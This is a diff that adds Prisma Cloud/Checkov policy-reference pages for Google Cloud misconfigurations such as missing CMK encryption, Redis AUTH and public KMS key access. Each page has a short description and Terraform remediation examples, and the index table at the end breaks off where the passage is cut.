b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-monitoring-enabled.adoc new file mode 100644 index 000000000..2fd37054c --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-monitoring-enabled.adoc @@ -0,0 +1,64 @@ +== GCP DataFusion does not have stack driver monitoring enabled + +Enabling Stackdriver monitoring for your Google Cloud Platform (GCP) DataFusion instance can help improve the security and management of your data. +Stackdriver is a monitoring and logging service that allows you to track the performance and health of your GCP resources. + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d207319b-a2d3-4896-8cdd-a7d4efbb7c1d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py[CKV_GCP_105] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_data_fusion_instance" "pass" { + project = "examplea" + provider = google-beta + name = "my-instance" + description = "My Data Fusion instance" + region = "us-central1" + type = "BASIC" + enable_stackdriver_logging = true + enable_stackdriver_monitoring = true + labels = { + example_key = "example_value" + } + + //private_instance = false + network_config { + network = "default" + ip_allocation = "10.89.48.0/22" + } + + version = "6.3.0" + dataproc_service_account = data.google_app_engine_default_service_account.default.email +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-dataproc-cluster-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-dataproc-cluster-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc new file mode 100644 index 000000000..98986a996 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-dataproc-cluster-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc @@ -0,0 +1,68 @@ +== GCP Dataproc cluster is not encrypted with Customer Supplied Encryption Keys (CSEKs) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 398aa1d3-0edd-4cf3-b2c3-b861a27be225 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py[CKV_GCP_91] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Dataproc cluster. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_dataproc_cluster +* *Arguments:* cluster_config.encryption_config.kms_key_name + + +[source,go] +---- +{ + "resource "google_dataproc_cluster" "pass" { + name = "simplecluster" + region = "us-central1" + cluster_config { + encryption_config{ + kms_key_name="SecretSquirrel" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-kms-keys-are-protected-from-deletion.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-kms-keys-are-protected-from-deletion.adoc new file mode 100644 index 000000000..6788e47b8 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-kms-keys-are-protected-from-deletion.adoc @@ -0,0 +1,56 @@ +== GCP KMS keys are not protected from deletion + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| db3149cb-de18-4818-b917-ead102d871b4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py[CKV_GCP_82] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Protecting your Google Cloud Platform (GCP) KMS keys from deletion can help ensure the security and integrity of your keys. +KMS keys are used to encrypt and decrypt data, and deleting them can cause data loss and disrupt the operation of your systems. +By protecting your KMS keys from deletion, you can help prevent accidental or unauthorized deletion of your keys. +This can help ensure that your keys are always available when needed, and can help protect your data from potential security threats such as data breaches or unauthorized access. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_kms_crypto_key" "pass" { + name = "crypto-key-example" + key_ring = google_kms_key_ring.keyring.id + rotation_period = "15552000s" + + lifecycle { + prevent_destroy = true + } + +}", +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-is-auth-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-is-auth-enabled.adoc new file mode 100644 index 000000000..1f313f331 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-is-auth-enabled.adoc @@ -0,0 +1,102 @@ +== GCP Memorystore for Redis has AUTH disabled + +//*Memorystore for Redis has AUTH disabled* + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b485b8a5-1a76-42d3-ba14-aa51e9bc5700 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py[CKV_GCP_95] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +https://cloud.google.com/memorystore/docs/redis/auth-overview[AUTH] is an optional security feature on Memorystore for Redis that requires incoming connections to authenticate with an AUTH string. +Every AUTH string is a Universally Unique Identifier (UUID), and each Redis instance with AUTH enabled has a unique AUTH string. +When you enable the AUTH feature on your Memorystore instance, incoming client connections must authenticate in order to connect. +Once a client authenticates with an AUTH string, it remains authenticated for the lifetime of that connection, even if you change the AUTH string. +We recommend that you enble AUTH on your Memorystore for Redis database to protect against unwanted or non-approved connections. + +//// +=== Fix - Runtime + + +* GCP Console* + + +To enable * AUTH* on your Memorystore for Redis database: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/memorystore/redis/instances [Memorystore for Redis]. + +. View your instance's _Instance details_ page by clicking on your * Instance ID*. + +. Select the * EDIT* button. + +. Scroll to the _Security section_ and select the checkbox for * Enable AUTH*. + + +* CLI Command* + + +To enable * AUTH* on your Memorystore for Redis instance execute the following command: + + +[source,shell] +---- +{ + "gcloud beta redis instances update INSTANCE-ID \\ + --enable-auth \\ + --region=REGION", + "name": "supported_resources" +} +---- + +Replace * INSTANCE-ID* with your Memorystore for Redis instance ID. +Replace * REGION* with the region where your Memorystore for Redis database lives. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_redis_instance +* *Field:* auth_enabled + + +[source,go] +---- +{ + "resource "google_redis_instance" "cache" { + name = "memory-cache" + display_name = "memory cache db" + tier = "STANDARD_HA" + memory_size_gb = 1 + +- auth_enabled = false ++ auth_enabled = true", + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-uses-intransit-encryption.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-uses-intransit-encryption.adoc new file mode 100644 index 000000000..ffb0f719d --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-uses-intransit-encryption.adoc @@ -0,0 +1,72 @@ +== GCP Memorystore for Redis does not use intransit encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 31eb817a-15ca-4bfa-a92b-0afa481eb4de + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py[CKV_GCP_97] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies the GCP Memorystore for Redis that are configured with disabled in-transit data encryption. +It is recommended that these resources will be configured with in-transit data encryption to minimize risk for sensitive data being leaked. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "esource "google_redis_instance" "pass" { + provider = google-beta + name = "mrr-memory-cache" + tier = "STANDARD_HA" + memory_size_gb = 5 + + location_id = "us-central1-a" + alternative_location_id = "us-central1-f" + + authorized_network = data.google_compute_network.redis-network.id + + redis_version = "REDIS_6_X" + display_name = "Terraform Test Instance" + reserved_ip_range = "192.168.0.0/28" + replica_count = 5 + read_replicas_mode = "READ_REPLICAS_ENABLED" + # auth_enabled=true + labels = { + my_key = "my_val" + other_key = "other_val" + } + + transit_encryption_mode = "SERVER_AUTHENTICATION" +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc new file mode 100644 index 000000000..166f13ed3 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc @@ -0,0 +1,62 @@ +== GCP Pub/Sub Topics are not encrypted with Customer Supplied Encryption Keys (CSEK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d14ed174-3ef7-4b69-b88e-545316a0c16e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py[CKV_GCP_83] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Pub/Sub Topics. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_pubsub_topic +* *Arguments:* kms_key_name + + +[source,go] +---- +{ + "resource "google_pubsub_topic" "pass" { + name = "example-topic" + kms_key_name = google_kms_crypto_key.crypto_key.id +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-resources-that-suppot-labels-have-labels.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-resources-that-suppot-labels-have-labels.adoc new file mode 100644 index 000000000..3529f6c5d --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-resources-that-suppot-labels-have-labels.adoc @@ -0,0 +1,126 @@ +== GCP resources that support labels do not have labels + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5969c32e-6e8f-48ff-bc9e-3a60d5ddafe6 + +|Checkov Check ID +|CKV_GCP_CUSTOM_1 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Many different types of GCP resources support labels. +Labels allow you to add metadata to a resource to help identify ownership, perform cost / billing analysis, and to enrich a resource with other valuable information, such as descriptions and environment names. +While there are many ways that labels can be used, we recommend you follow a labeling practice. +View Google's recommended labeling best practices https://cloud.google.com/compute/docs/labeling-resources[here]. + + +[source,text] +---- +{ + "google_active_directory_domain +google_bigquery_dataset +google_bigquery_job +google_bigquery_table +google_bigtable_instance +google_cloud_identity_group +google_cloudfunctions_function +google_composer_environment +google_compute_disk +google_compute_image +google_compute_instance +google_compute_instance_from_template +google_compute_instance_template +google_compute_region_disk +google_compute_snapshot +google_dataflow_job +google_dataproc_cluster +google_dataproc_job +google_dns_managed_zone +google_eventarc_trigger +google_filestore_instance +google_game_services_game_server_cluster +google_game_services_game_server_config +google_game_services_game_server_deployment +google_game_services_realm +google_healthcare_consent_store +google_healthcare_dicom_store +google_healthcare_fhir_store +google_healthcare_hl7_v2_store +google_kms_crypto_key +google_ml_engine_model +google_monitoring_notification_channel +google_network_management_connectivity_test +google_notebooks_instance +google_project +google_pubsub_subscription +google_pubsub_topic +google_redis_instance +google_secret_manager_secret +google_spanner_instance +google_storage_bucket +google_tpu_node +google_workflows_workflow'", + "name": "supported_resources" +} +---- + + +=== Fix - Buildtime + + +*Terraform* + + +The example below shows how to label a security group in Terraform. +The syntax is generally the same for any label-enabled resource type. + + +[source,go] +---- +{ + "resource "google_storage_bucket" "auto-expire" { + name = "auto-expiring-bucket" + location = "US" + force_destroy = true + ++ label { ++ type = prod + } + + + lifecycle_rule { + condition { + age = 3 + } + + action { + type = "Delete" + } + + } +} + +", + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc new file mode 100644 index 000000000..31f273fde --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc @@ -0,0 +1,70 @@ +== GCP Spanner Database is not encrypted with Customer Supplied Encryption Keys (CSEKs) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8f4dcb9b-5a0c-43ad-b323-1de833542647 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py[CKV_GCP_93] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Spanner Database. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_spanner_database +* *Arguments:* encryption_config.kms_key_name + + +[source,go] +---- +{ + "resource "google_spanner_database" "pass" { + instance = google_spanner_instance.example.name + name = "my-database" + ddl = [ + "CREATE TABLE t1 (t1 INT64 NOT NULL,) PRIMARY KEY(t1)", + "CREATE TABLE t2 (t2 INT64 NOT NULL,) PRIMARY KEY(t2)", + ] + deletion_protection = false + encryption_config { + kms_key_name= google_kms_crypto_key.example.name + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-sql-database-uses-the-latest-major-version.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-sql-database-uses-the-latest-major-version.adoc new file mode 100644 index 000000000..91191345a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-sql-database-uses-the-latest-major-version.adoc @@ -0,0 +1,64 @@ +== GCP SQL database does not use the latest Major version + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f13dff47-149d-4a80-b8ab-8cdb6d9aee7b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py[CKV_GCP_79] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Using the latest major version for your Google Cloud Platform (GCP) SQL database can help improve the security and reliability of your database. +Newer versions of software often include security updates and bug fixes that can help protect your database from potential threats and improve its performance. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "pass" { + provider = google-beta + + name = "private-instance-${random_id.db_name_suffix.hex}" + region = "us-central1" + database_version = "MYSQL_8_0" + + depends_on = [google_service_networking_connection.private_vpc_connection] + + settings { + tier = "db-f1-micro" + ip_configuration { + ipv4_enabled = false + private_network = google_compute_network.private_network.id + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-subnet-has-a-private-ip-google-access.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-subnet-has-a-private-ip-google-access.adoc new file mode 100644 index 000000000..e03f5522c --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-subnet-has-a-private-ip-google-access.adoc @@ -0,0 +1,59 @@ +== GCP subnet does not have a private IP Google access + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0c40a773-7046-40f9-bbc5-7fe3afe661e3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py[CKV_GCP_74] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling private IP Google access for your Google Cloud Platform (GCP) subnet can help improve the security and performance of your network. +Private IP Google access allows resources in your subnet to access Google APIs and services over a private IP connection, rather than a public connection. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_compute_subnetwork" "pass" { + name = "example" + ip_cidr_range = "10.0.0.0/16" + network = "google_compute_network.vpc.self_link" + + log_config { + aggregation_interval = "INTERVAL_10_MIN" + flow_sampling = 0.5 + metadata = "INCLUDE_ALL_METADATA" + } + + private_ip_google_access = true +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk.adoc new file mode 100644 index 000000000..26184f357 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk.adoc @@ -0,0 +1,62 @@ +== GCP Vertex AI datasets do not use a Customer Manager Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 891139f5-760f-4ed7-8718-278fe9b90798 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py[CKV_GCP_92] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies Vertex AI datasets which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer managed KMS Keys to encrypt your Vertex AI datasets data. +It gives you full control over the encrypted data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_vertex_ai_dataset +* *Arguments:* region.encryption_spec.kms_key_name + + +[source,go] +---- +{ + " +resource "google_vertex_ai_dataset" "pass" { + display_name = "terraform" + metadata_schema_uri = "gs://google-cloud-aiplatform/schema/dataset/metadata/image_1.0.0.yaml" + region = "us-central1" + encryption_spec { + kms_key_name=google_kms_crypto_key.example.name + } + + +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk.adoc new file mode 100644 index 000000000..a8f6b7e92 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk.adoc @@ -0,0 +1,59 @@ +== GCP Vertex AI Metadata Store does not use a Customer Manager Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c50376d2-9539-4696-b018-2a12cbf3bb34 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py[CKV_GCP_96] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies Vertex AI Metadata Stores which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer-managed KMS Keys to encrypt your Vertex AI Metadata Store data. +It gives you full control over the encrypted data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_vertex_ai_metadata_store +* *Arguments:* region.encryption_spec.kms_key_name + + +[source,go] +---- +{ + "resource "google_vertex_ai_metadata_store" "pass" { + name = "test-store" + description = "Store to test the terraform module" + region = "us-central1" + encryption_spec { + kms_key_name=google_kms_crypto_key.example.name + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index 000000000..a5150001f --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,127 @@ +== GCP KMS crypto key is anonymously accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e4c7d880-c590-481c-86cc-8c55245609b0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml[CKV2_GCP_6] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +It is recommended that the IAM policy on Cloud KMS cryptokeys should restrict anonymous and/or public access. +Granting permissions to allUsers or allAuthenticatedUsers allows anyone to access the dataset. +Such access might not be desirable if sensitive data is stored at the location. +In this case, ensure that anonymous and/or public access to a Cloud KMS cryptokey is not allowed. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_kms_crypto_key +* *Arguments:* google_kms_crypto_key_iam_member / google_kms_crypto_key_iam_binding + + +[source,go] +---- +{ + "resource "google_kms_key_ring" "keyring" { + name = "keyring-example" + location = "global" +} + + +resource "google_kms_crypto_key" "bad_key" { + name = "crypto-key-example" + key_ring = google_kms_key_ring.keyring.id + rotation_period = "100000s" + lifecycle { + prevent_destroy = true + } + +} + +resource "google_kms_crypto_key_iam_member" "bad_member_1" { + crypto_key_id = google_kms_crypto_key.bad_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" +- member = "allUsers" +} + + +resource "google_kms_crypto_key_iam_member" "bad_member_2" { + crypto_key_id = google_kms_crypto_key.bad_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" +- member = "allAuthenticatedUsers" +} + + +resource "google_kms_crypto_key_iam_binding" "bad_binding_1" { + crypto_key_id = google_kms_crypto_key.bad_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" +- members = [ +- "allUsers", +- ] +} + + +resource "google_kms_crypto_key_iam_binding" "bad_binding_2" { + crypto_key_id = google_kms_crypto_key.bad_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" +- members = [ +- "allAuthenticatedUsers", +- ] +} + + +resource "google_kms_crypto_key" "good_key" { + name = "crypto-key-example" + key_ring = google_kms_key_ring.keyring.id + rotation_period = "100000s" + lifecycle { + prevent_destroy = true + } + +} + +resource "google_kms_crypto_key_iam_member" "good_member" { + crypto_key_id = google_kms_crypto_key.good_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" ++ member = "user:jane@example.com" +} + + +resource "google_kms_crypto_key_iam_binding" "good_binding" { + crypto_key_id = google_kms_crypto_key.good_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" ++ members = [ ++ "user:jane@example.com", ++ ] +} + + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account.adoc new file mode 100644 index 000000000..35dd5ba5a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account.adoc @@ -0,0 +1,75 @@ +== There are not only GCP-managed service account keys for each service account + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e2becef9-8485-4a18-b9d5-803ed6bab232 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml[CKV2_GCP_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Anyone who has access to the keys will be able to access resources through the service account. +GCP-managed keys are used by Cloud Platform services such as App Engine and Compute Engine. +These keys cannot be downloaded. + +Google will keep the keys and automatically rotate them on an approximately weekly basis. +User-managed keys are created, downloadable, and managed by users. +They expire 10 years from creation. + +For user-managed keys, the user has to take ownership of key management activities which include: + +* Key storage +* Key distribution +* Key revocation +* Key rotation +* Protecting the keys from unauthorized users +* Key recovery Even with key owner precautions, keys can be easily leaked by common development malpractices like checking keys into the source code or leaving them in the Downloads directory, or accidentally leaving them on support blogs/channels. + +We recommended you prevent user-managed service account keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_service_account, google_service_account_key +* *Arguments:* service_account_id + + +[source,go] +---- +{ + "resource "google_service_account" "account_ok" { + account_id = "dev-foo-account" +} + + +resource "google_service_account_key" "ok_key" { + service_account_id = google_service_account.account_ok.name +} + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/google-cloud-general-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/google-cloud-general-policies.adoc new file mode 100644 index 000000000..fee26b373 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/google-cloud-general-policies.adoc @@ -0,0 +1,159 @@ +== Google Cloud General Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-general-1.adoc[GCP SQL Instances do not have SSL configured for incoming connections] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py[CKV_GCP_6] +|HIGH + + +|xref:bc-gcp-general-2.adoc[GCP SQL database instance does not have backup configuration enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py[CKV_GCP_14] +|HIGH + + +|xref:bc-gcp-general-3.adoc[GCP BigQuery dataset is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py[CKV_GCP_15] +|HIGH + + +|xref:bc-gcp-general-4.adoc[GCP KMS Symmetric key not rotating in every 90 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py[CKV_GCP_43] +|MEDIUM + + +|xref:bc-gcp-general-x.adoc[GCP VM disks not encrypted with Customer-Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py[CKV_GCP_37] +|LOW + + +|xref:bc-gcp-general-y.adoc[GCP VM instance with Shielded VM features disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py[CKV_GCP_39] +|MEDIUM + + +|xref:encrypt-boot-disks-for-instances-with-cseks.adoc[Boot disks for instances do not use CSEKs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py[CKV_GCP_38] +|HIGH + + +|xref:ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc[GCP Artifact Registry repositories are not encrypted with Customer Supplied Encryption Keys (CSEK)] +| 